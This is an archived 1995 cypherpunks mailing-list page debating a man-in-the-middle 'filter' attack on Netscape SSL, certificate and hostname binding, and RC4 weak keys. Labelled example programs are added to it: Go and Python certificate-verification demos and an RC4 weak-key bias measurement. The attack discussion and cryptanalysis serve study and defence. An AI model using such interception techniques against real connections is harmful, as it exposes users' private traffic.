> > > As the protocol progresses the filter also uses the master key, > > > and follows the renegotiation as the master key expires. > > > > Yeah, but in order for this to work, the fake server needs to know > > netscape.com's private (secret) key, no? > > > > -jon > > No ... the public part of any server private key is held by the filter > and not returned to the client. The client only encrypts with public > keys provided by the filter.
> The Server only encrypts with public keys > provided by the filter. The filter has cleartext of the entire session. > > John > > From Don.Stephenson at Eng.Sun.COM Sat Sep 30 17:33:59 1995 From: Don.Stephenson at Eng.Sun.COM (Don Stephenson) Date: Sat, 30 Sep 95 17:33:59 PDT Subject: NetScape's dependence upon RSA down for the count! Message-ID: <9510010024.AA08498@icenine.Eng.Sun.COM> Yes, but the certificate that contains the public key of the server is digitally signed by the certificate authority (CA). To create such a certificate requires the secret key of the CA. The public key of the CA is contained in the client software, which uses it to verify the validity of the server certificate. - Don > From jbass at dmsd.com Sat Sep 30 17:15:36 1995 > Date: Sat, 30 Sep 95 16:50:05 -0600 > From: jbass at dmsd.com (John L. Bass) > To: www-security at ns2.rutgers.edu, cypherpunks at toad.com > Subject: Re: NetScape's dependence upon RSA down for the count! > > > Ok ... one more time ... the filter has to replace the client/server > keys in the packet stream with its own ... > > John > > From anon-remailer at utopia.hacktic.nl Sat Sep 30 18:30:13 1995 From: anon-remailer at utopia.hacktic.nl (Name Withheld by Request) Date: Sat, 30 Sep 95 18:30:13 PDT Subject: Auto-signing In-Reply-To: <199509302209.PAA03217@infinity.c2.org> Message-ID: <199510010130.CAA07315@utopia.hacktic.nl> gmixo wrote: > would someone please send me information about any autosigning > services.... like the gratis auto-signing.... and others like it.... > thanks Look at http://www.hks.net/ I don't know of any others. Although the moderator of comp.os.linux.announce has a policy of PGP-signing all approved posts as a method of combatting spam.
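The filter John Bass describes (the man-in-the-middle Eric Murray names) run against the two kinds of client the thread has in mind, as an added example that is nobody's code from the thread: a client that encrypts to whatever public key arrives is keyed to the filter on one leg while the filter is keyed to the real server on the other, exactly as Bass draws it; a client that does what Don Stephenson describes, chaining the certificate to a CA key it already holds, rejects the filter's self-signed substitute. The example also checks that the certificate names the host the client meant to reach, since a CA-signed certificate the filter obtained for some other name would otherwise pass. Built with Go's crypto/x509; the CA, the host name www.example.com and the filter's second certificate are constructed for the demonstration. The name check uses the subjectAltName dNSName extension, which current verifiers require; 1995 clients looked at the CN.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"time"
)

var serial int64

// issue makes a fresh P-256 key and a certificate for name. With parent nil
// the certificate is self-signed; otherwise parentKey signs it. Failures
// panic, which is acceptable for a demonstration.
func issue(name string, isCA bool, parent *x509.Certificate, parentKey *ecdsa.PrivateKey) (*x509.Certificate, *ecdsa.PrivateKey) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		panic(err)
	}
	serial++
	tmpl := &x509.Certificate{
		SerialNumber:          big.NewInt(serial),
		Subject:               pkix.Name{CommonName: name},
		NotBefore:             time.Now().Add(-time.Hour),
		NotAfter:              time.Now().Add(24 * time.Hour),
		BasicConstraintsValid: true,
		IsCA:                  isCA,
		KeyUsage:              x509.KeyUsageDigitalSignature,
	}
	if isCA {
		tmpl.KeyUsage = x509.KeyUsageCertSign
	} else {
		tmpl.ExtKeyUsage = []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth}
		tmpl.DNSNames = []string{name} // subjectAltName; 1995 clients read the CN instead
	}
	signer, signerKey := tmpl, key
	if parent != nil {
		signer, signerKey = parent, parentKey
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, signer, &key.PublicKey, signerKey)
	if err != nil {
		panic(err)
	}
	cert, err := x509.ParseCertificate(der)
	if err != nil {
		panic(err)
	}
	return cert, key
}

// ServerHello is what a client sees first: the certificate carrying the
// public key it will encrypt the master key to.
type ServerHello struct{ Cert *x509.Certificate }

// filter is Bass's man in the middle: toward the client it presents a
// certificate whose private key it holds; toward the server it plays client
// with the real certificate.
func filter(fromServer ServerHello, filterCert *x509.Certificate) (toClient, toServer ServerHello) {
	return ServerHello{Cert: filterCert}, fromServer
}

// naiveClient encrypts to whatever key arrives: the client the attack assumes.
func naiveClient(h ServerHello) *ecdsa.PublicKey {
	return h.Cert.PublicKey.(*ecdsa.PublicKey)
}

// verifyingClient uses a key only if its certificate chains to a CA key the
// client already holds and names the host the client meant to reach.
func verifyingClient(h ServerHello, roots *x509.CertPool, host string) (*ecdsa.PublicKey, error) {
	if _, err := h.Cert.Verify(x509.VerifyOptions{Roots: roots, DNSName: host}); err != nil {
		return nil, err
	}
	return h.Cert.PublicKey.(*ecdsa.PublicKey), nil
}

// Outcome records who ends up keyed to whom in each scenario.
type Outcome struct {
	NaiveFilterReads    bool // naive client keyed to the filter: filter has cleartext
	FilterServerLeg     bool // filter, playing client, keyed to the real server
	VerifyingSelfSigned bool // verifying client accepts a self-signed filter cert?
	VerifyingWrongHost  bool // ...or a CA-signed cert the filter got for another name?
	VerifyingRealServer bool // ...and still accepts the genuine server?
}

func RunScenarios() Outcome {
	const host = "www.example.com" // constructed for the example
	ca, caKey := issue("Example CA", true, nil, nil)
	server, serverKey := issue(host, false, ca, caKey)
	// What a filter can present: a self-signed certificate bearing the server's
	// name, or a real CA-signed certificate for some other name.
	selfSigned, selfKey := issue(host, false, nil, nil)
	otherHost, _ := issue("www.attacker.example", false, ca, caKey)
	roots := x509.NewCertPool()
	roots.AddCert(ca)
	genuine := ServerHello{Cert: server}

	var o Outcome
	toClient, toServer := filter(genuine, selfSigned)
	o.NaiveFilterReads = naiveClient(toClient).Equal(&selfKey.PublicKey)
	o.FilterServerLeg = naiveClient(toServer).Equal(&serverKey.PublicKey)
	_, err := verifyingClient(toClient, roots, host)
	o.VerifyingSelfSigned = err == nil
	toClient, _ = filter(genuine, otherHost)
	_, err = verifyingClient(toClient, roots, host)
	o.VerifyingWrongHost = err == nil
	_, err = verifyingClient(genuine, roots, host)
	o.VerifyingRealServer = err == nil
	return o
}

func main() {
	fmt.Printf("%+v\n", RunScenarios())
}
```

The verifying client is only as good as the root set it ships with and the name it insists on: a filter holding any certificate the client's roots will vouch for, issued to the name the client checks, is indistinguishable from the server, which is why the CA's signing key and the name binding carry the whole weight.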
From remailer at flame.alias.net Sat Sep 30 18:31:10 1995 From: remailer at flame.alias.net (Flame Remailer) Date: Sat, 30 Sep 95 18:31:10 PDT Subject: Linux RSA Library (fwd) Message-ID: <199510010131.CAA07331@utopia.hacktic.nl> From: Jim Kinder Newsgroups: comp.os.linux.announce Subject: RSA Encryption Utilities. Followup-To: comp.os.linux.development.apps Date: Sat, 30 Sep 95 14:28:37 GMT Organization: Network Application Technology Lines: 39 Approved: linux-announce at news.ornl.gov (Lars Wirzenius) Message-ID: NNTP-Posting-Host: kruuna.helsinki.fi Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit -----BEGIN PGP SIGNED MESSAGE----- I have a set of Encryption Utilities for Linux
crypt - Unix style crypt(1) command using homebrew algorithm
rcrypt - Better version of crypt
primegen - Unlimited size prime number generator
rsacrypt - Unlimited key size RSA encryption system.
rsadecrypt - Decryption for rsacrypt
genkey - Generate RSA keys.
This package is similar to pgp, but the algorithms are more transparent, and the key size is unlimited. It uses C++. I wrote all of this code myself and I will give it away to whomever wants it. I am planning on using it to write an encrypted mail system. If you want this code I will e-mail it to you in uuencode format. - -- Send comp.os.linux.announce submissions to: linux-announce at news.ornl.gov PLEASE remember a short description of the software. -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMG1OyIQRll5MupLRAQFHeAP9GO7IJSu0eqWbnVKWUSk/RQZU+5jwRuEv U1TzLaRZO4F5GXG3E4awx0RonuDtOeOZ/wCls7MONlk3JP0YigpxY23jA3pbfUhx 5JdbVYrbdNm5yi18GlRgsGdhkzIyTXPB7s/F2tUAxC80fxC85LM7O1RFINRrgUrc QDIOmJNZVMM= =Q9w9 -----END PGP SIGNATURE----- From ses at tipper.oit.unc.edu Sat Sep 30 19:20:06 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Sat, 30 Sep 95 19:20:06 PDT Subject: NetScape's dependence upon RSA down for the count!
In-Reply-To: <199509302336.QAA23456@slack.lne.com> Message-ID: On Sat, 30 Sep 1995, Eric Murray wrote: > What you have described is the classic 'man in the middle' attack. > Netscape claims that SSL V.3 is immune to the MITM attack in > appendix D.4 of the SSL V.3 spec. I think you're misunderstanding the claim somewhat - what D.4 does is warn implementors that they should perform some means of associating hostnames and certificates. You can't just use SSL out of the box without doing anything in the application to check. My currently recommended approach is to enforce the verisign requirement that all valid hostnames for the server be included in the certificate as CN values. This allows the check to be made below the application layer. Unfortunately a lot of currently issued certificates are non-compliant (even Verisign and netscape :-); any fully automated implementation needs a static table of hostnames aliases- interactive applications can display certificates for manual review. > > You will need to get the 'filter' (MITM) key signed by Verisign. > Or hack Verisign's server-key-signing key. This is not really much protection. Getting hold of any key is much easier than getting a specific key, and don't forget there are a number of vulnerable keys floating around until their expiration dates pass. This attack has been known about for a long time, and is too obvious to be really interesting; I implemented a demonstration of the attack as part of developing a protection. If anybody is interested I can mail them my report. The variant of the attack I implemented is useless for anything but demonstration purposes, or I'd ask sameer for a T-shirt. 
The external fix is a bit more useful, but there doesn't seem to be a patchnetscape alias :-) Simon From rsalz at osf.org Sat Sep 30 19:44:08 1995 From: rsalz at osf.org (Rich Salz) Date: Sat, 30 Sep 95 19:44:08 PDT Subject: "Notes" to be Eclipsed by "Netscape" Message-ID: <9510010242.AA06388@sulphur.osf.org> > I've seen Notes running ... > but my access to it was only marginal. > But, knowing the software, it wouldn't surprise me if there were > some serious bugs in the security code. Er, sounds to me like you're leaping to some conclusions... At any rate, one of the designers of Notes's security was Charlie Kaufman (formerly of Digital, recent author of a security book mentioned here) and he is No Slouch. /r$ From jcaldwel at iquest.net Sat Sep 30 19:57:30 1995 From: jcaldwel at iquest.net (James Caldwell) Date: Sat, 30 Sep 95 19:57:30 PDT Subject: Operation Stop The Aliens Message-ID: To whom it may concern: This fellow's proposed actions are those of a blind fool who cannot see the forest for the trees. As such he is nothing more than part of the problem. He sees foreign immigrants, legal or illegal, as being a problem. The problem he is seeing is not any problem created by the immigrants who are looking for something better, but one created for the very purpose of distracting such fools as him from the underlying problems his state and this Nation face. He has bought the lie spewed by the talking heads and other psychological operations that have told him to think the 'illegals' are causing some sort of problem. Prop 187 and such proposals are nothing more than a method to have implemented systems and plans, not to correct the alleged problem, but to implement an underlying plan that was the desired goal from the start; namely a national ID and tracking system. This is a typical tactic, race against race, religion against religion, etc. all to divide us into small, blind, ineffective, bickering groups who have little voice and no cohesive political power.
If his actions do not accelerate what is already occurring then the real enemy is asleep, as it is a wonderful opportunity for further psychological operations that will benefit them in numerous ways. From skaplin at skypoint.com Sat Sep 30 21:18:11 1995 From: skaplin at skypoint.com (skaplin at skypoint.com) Date: Sat, 30 Sep 95 21:18:11 PDT Subject: Digests No Longer Available Message-ID: Due to some personal issues, I am being forced to cut back my net involvement. Cypherpunks and its digests are a casualty of this. Effective immediately I will no longer be keeping digests of the list. Hopefully in a few months I'll be back. Sam From jbass at dmsd.com Sat Sep 30 21:46:56 1995 From: jbass at dmsd.com (John L. Bass) Date: Sat, 30 Sep 95 21:46:56 PDT Subject: NetScape's dependence upon RSA down for the count! Message-ID: <9510010446.AA11983@dmsd.com> > BTW your 'offer' is silly- this is not a trivial amount of work, and you > would not deserve any credit for coming up with so ordinary an > attack. Write the code yourself, or pay the market rate for it. > -- > Eric Murray ericm at lne.com ericm at motorcycle.com http://www.lne.com/ericm So is the Tee Shirt offer, and so is cracking the RSA public key algorithm ... the point is that at least two teams did it. My offer is trivial in $$'s I agree, but the challenge I offer is to focus on the weaknesses of SSL rather than its strengths (large keys). I suspect this is easier than most people think, so maybe I should offer a Tee Shirt instead? I suspect the certificates can be attacked in one of several ways. The most likely is that the filter can use the server's certificate and fake, forge, or simply substitute a valid one in the filter's name for the client. This might mean that the filter has to become a trusted server as well. I don't see any problems with the filter playing client to the server given the SSL protocol.
Another is, since the clients are often distributed over the net, that another filter is installed to recognize clients and alter them on the fly to avoid the client/filter problem in the future. Another tack is based on getting very close to the server (in a bridge or router in the direct path to the server), in which the filter might actually be able to get valid certificates signed in the server's name, while eating the real requests.

The reality is that all three parties are strangers, and I have had doubts about the very nature of certificates & public key in this case.

John Bass
DMS Design

From rsalz at osf.org Sat Sep 30 22:34:11 1995
From: rsalz at osf.org (Rich Salz)
Date: Sat, 30 Sep 95 22:34:11 PDT
Subject: T-shirt on French TV
Message-ID: <9510010533.AA06669@sulphur.osf.org>

Timing is everything... I happened to be flipping the channels while on the TV in my hotel room Friday evening between 8 and 8:30 when I saw someone wearing the UK crypto shirt on a talk show on French TV3. I know no French. A guy was standing up wearing the shirt, turning around, holding it out for the camera, etc. Someone sitting down was talking about it to the moderator -- I heard words like cryptographique a few times. When the speaker pointed to the "may be illegal in France" part, the guy took the shirt off and the crowd laughed. The segment was about 10 minutes.

/r$

From mixmaster at vishnu.alias.net Sat Sep 30 22:49:38 1995
From: mixmaster at vishnu.alias.net (Mr. Boffo)
Date: Sat, 30 Sep 95 22:49:38 PDT
Subject: RSA's comments on RC4 weak keys
In-Reply-To: <9508298124.AA812423895@snail.rsa.com>
Message-ID: <199510010537.AAA09694@alpha.jpunix.com>

Robert W. Baldwin wrote:
> Here is our response to the excellent work that Andrew Roos has been
> doing on RC4. I am glad that people are looking at RC4 critically.

Oh really? A year ago you didn't want anyone looking at RC4 at all! But since you now seem to be for open review, we'd be happy to cryptanalyze RC2 for ya also.
:)

From Don.Stephenson at Eng.Sun.COM Sat Sep 30 23:16:29 1995
From: Don.Stephenson at Eng.Sun.COM (Don Stephenson)
Date: Sat, 30 Sep 95 23:16:29 PDT
Subject: NetScape's dependence upon RSA down for the count!
Message-ID: <9510010614.AA08538@icenine.Eng.Sun.COM>

> From ses at tipper.oit.unc.edu Sat Sep 30 20:43:51 1995
> My currently recommended approach is to enforce the verisign requirement
> that all valid hostnames for the server be included in the certificate as
> CN values. This allows the check to be made below the application layer.
> Unfortunately a lot of currently issued certificates are non-compliant
> (even Verisign and netscape :-); any fully automated implementation needs
> a static table of hostname aliases- interactive applications can
> display certificates for manual review.

I don't think binding hostnames to certificates helps much because both hostnames and IP addresses can be spoofed and DNS servers can be subverted. The important thing is the binding to the "service" name or definition (e.g. InterState online banking service).

> This is not really much protection. Getting hold of any key is much
> easier than getting a specific key, and don't forget there are a number
> of vulnerable keys floating around until their expiration dates pass.

Well of course, if the secret key of the server (or worse yet, certificate authority) is compromised, all bets are off. That's true of just about any protocol you can dream up. Are you just referring to the problem of accurate and up to date certificate revocation lists (CRL) being available? If so, you're right, this is a very difficult problem to solve without having a truly reliable and pervasive key-distribution & CRL system deployed throughout the world.

- Don

From rsalz at osf.org Sat Sep 30 23:17:30 1995
From: rsalz at osf.org (Rich Salz)
Date: Sat, 30 Sep 95 23:17:30 PDT
Subject: SAIC bought InterNic, but who is SAIC? A spook contractor!
Message-ID: <9510010616.AA06860@sulphur.osf.org>

One of the most interesting things SAIC does is run places that monitor seismic events. S.E.'s, by the way, are things that might be earthquakes but could be A-bomb tests. SAIC ran the Center for Seismic Studies in Arlington, VA. Rick Adams, co-founder of UUnet, made one of their machines, seismo, the UUCP hub of the world for a couple of years.

/r$
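The certificate-substitution attack John Bass sketches in his "NetScape's dependence upon RSA" message (a filter in the path presents a CA-signed certificate issued in its own name) and the hostname check quoted in Don Stephenson's reply (every hostname the client expects must appear among the certificate's names, with a static alias table for non-compliant certificates) can be made concrete with the following client-side identity check. This is an added example, not code from Netscape, Verisign, or any poster in the thread. It assumes signature and chain verification have already been done elsewhere and only decides whether the verified certificate is bound to the service the client meant to reach; the hostnames, serial numbers, times, alias table and the "Example CA" issuer are all constructed for the example.

```python
"""Client-side certificate identity check (added example, not code from the
thread above). Signature/chain checking is assumed done already; this code
decides whether the verified certificate belongs to the requested service.
All names, serials, times and the alias table below are constructed."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Certificate:
    names: tuple          # CN plus any dNSName entries the CA bound to the key
    issuer: str
    serial: int
    not_after: int        # expiry, seconds since the epoch (constructed values)
    signature_ok: bool    # outcome of the chain check, assumed done elsewhere


# Constructed alias table: hostname the user typed -> identity in the certificate.
# Needed for the non-compliant certificates Simon mentions that omit hostnames.
ALIASES = {
    "www.bank.example": "bank.example",
    "online.bank.example": "bank.example",
}


def name_matches(pattern: str, host: str) -> bool:
    """Match one certificate name against a hostname, case-insensitively.

    A wildcard counts only as the whole leftmost label and covers one label:
    '*.bank.example' matches 'www.bank.example' but neither 'bank.example'
    nor 'a.b.bank.example'.
    """
    pattern, host = pattern.lower().rstrip("."), host.lower().rstrip(".")
    if pattern == host:
        return True
    if not pattern.startswith("*.") or "*" in pattern[2:]:
        return False
    labels = host.split(".")
    return len(labels) >= 3 and ".".join(labels[1:]) == pattern[2:]


def check_identity(cert, requested_host, now, trusted_issuers, revoked,
                   aliases=ALIASES):
    """Decide whether a chain-verified certificate belongs to the service the
    client asked for. Returns (accepted, reason)."""
    if not cert.signature_ok or cert.issuer not in trusted_issuers:
        return False, "chain not trusted"
    if now > cert.not_after:
        return False, "expired"
    if (cert.issuer, cert.serial) in revoked:
        return False, "revoked"
    expected = aliases.get(requested_host.lower(), requested_host.lower())
    for name in cert.names:
        if name_matches(name, expected):
            return True, "bound to %s via %s" % (expected, name)
    return False, "names %s do not cover %s" % (list(cert.names), expected)


# Constructed scenario: one honest server, one filter in the path, one trusted CA.
NOW = 812_000_000                               # late September 1995, constructed
YEAR = 365 * 86400
TRUSTED = {"Example CA"}
BANK = Certificate(("bank.example",), "Example CA", 101, NOW + YEAR, True)
WILD = Certificate(("*.bank.example",), "Example CA", 102, NOW + YEAR, True)
FILTER = Certificate(("filter.isp.example",), "Example CA", 202, NOW + YEAR, True)


def run_scenarios():
    """Exercise the check against the attacks discussed in the thread."""
    results = {}
    # Honest connection; the alias table maps the typed name to the certified one.
    results["honest"] = check_identity(BANK, "www.bank.example", NOW, TRUSTED, set())[0]
    # Bass's substitution: a valid certificate with the wrong identity. Rejected
    # only because the client compares the name it wanted with the name certified.
    results["substituted"] = check_identity(FILTER, "www.bank.example", NOW, TRUSTED, set())[0]
    # A wildcard certificate covers hosts under the domain but not the bare domain.
    results["wildcard_host"] = check_identity(WILD, "shop.bank.example", NOW, TRUSTED, set())[0]
    results["wildcard_bare"] = check_identity(WILD, "bank.example", NOW, TRUSTED, set())[0]
    # Stephenson's caveat: with the server's own key stolen, the name check
    # passes and only a current revocation list catches the certificate.
    results["stolen_key"] = check_identity(BANK, "www.bank.example", NOW, TRUSTED, set())[0]
    results["stolen_key_revoked"] = check_identity(
        BANK, "www.bank.example", NOW, TRUSTED, {("Example CA", 101)})[0]
    return results


if __name__ == "__main__":
    for scenario, accepted in run_scenarios().items():
        print("%-18s %s" % (scenario, "accepted" if accepted else "rejected"))
```

The point the scenarios make is the one Bass and Stephenson circle around: a CA signature proves only that some CA bound a name to a key, so the filter's own valid certificate is stopped solely by the client insisting on the name it intended to reach, while a certificate in the genuine server's name (stolen key, or a CA induced to issue one) passes every local check and is caught only by an up-to-date revocation list.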
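The Baldwin note quoted in the "RSA's comments on RC4 weak keys" message refers to Andrew Roos's 1995 result, which the page itself does not state. As an added example (not code from RSA, from Roos, or from any poster), the block below implements RC4 and measures the weak-key effect; the condition assumed here, from Roos's note, is that keys with K[0] + K[1] == 0 (mod 256) leave S[1] = 1 after step 1 of key scheduling and put K[2] + 3 into S[2] at step 2, so that whenever the remaining 253 steps never touch either slot, about (254/256)**253, roughly 0.138 of the time, the first keystream byte is K[2] + 3. The sample keys are generated from a fixed seed and are constructed for the example.

```python
"""RC4 and the Roos (1995) weak-key class. Added example, not code from RSA,
Roos, or the thread above. Assumed condition: K[0] + K[1] == 0 (mod 256),
under which the first keystream byte equals K[2] + 3 about 13.8% of the time
(the chance that S[1] and S[2] survive the last 253 key-scheduling swaps)."""
import random


def rc4_ksa(key: bytes) -> list:
    """Key-scheduling algorithm: permute S under the key."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Pseudo-random generation: the first `length` keystream bytes."""
    S = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def is_roos_weak(key: bytes) -> bool:
    """Roos's class: the first two key bytes sum to zero modulo 256."""
    return len(key) >= 3 and (key[0] + key[1]) & 0xFF == 0


def first_byte_leak_rate(keys) -> float:
    """Fraction of keys whose first keystream byte equals K[2] + 3 (mod 256).
    About 0.138 for Roos-weak keys, about 1/256 for unrelated keys."""
    keys = list(keys)
    hits = sum(1 for k in keys if rc4_keystream(k, 1)[0] == (k[2] + 3) & 0xFF)
    return hits / len(keys)


def sample_keys(count: int, key_len: int, weak: bool, seed: int) -> list:
    """Constructed random keys; with weak=True, K[1] is forced to -K[0] mod 256."""
    rng = random.Random(seed)
    keys = []
    for _ in range(count):
        k = bytearray(rng.randrange(256) for _ in range(key_len))
        if weak:
            k[1] = (-k[0]) & 0xFF
        keys.append(bytes(k))
    return keys


if __name__ == "__main__":
    weak = sample_keys(4000, 5, True, seed=1)
    plain = sample_keys(4000, 5, False, seed=2)
    print("weak keys:   first byte == K[2]+3 in %.3f of cases" % first_byte_leak_rate(weak))
    print("random keys: first byte == K[2]+3 in %.3f of cases" % first_byte_leak_rate(plain))
```

A 13.8% correlation between one key byte and the first output byte is not a key-recovery attack on its own, but it is exactly the kind of result a closed algorithm cannot get until outsiders are allowed to look, which is the point the message is making.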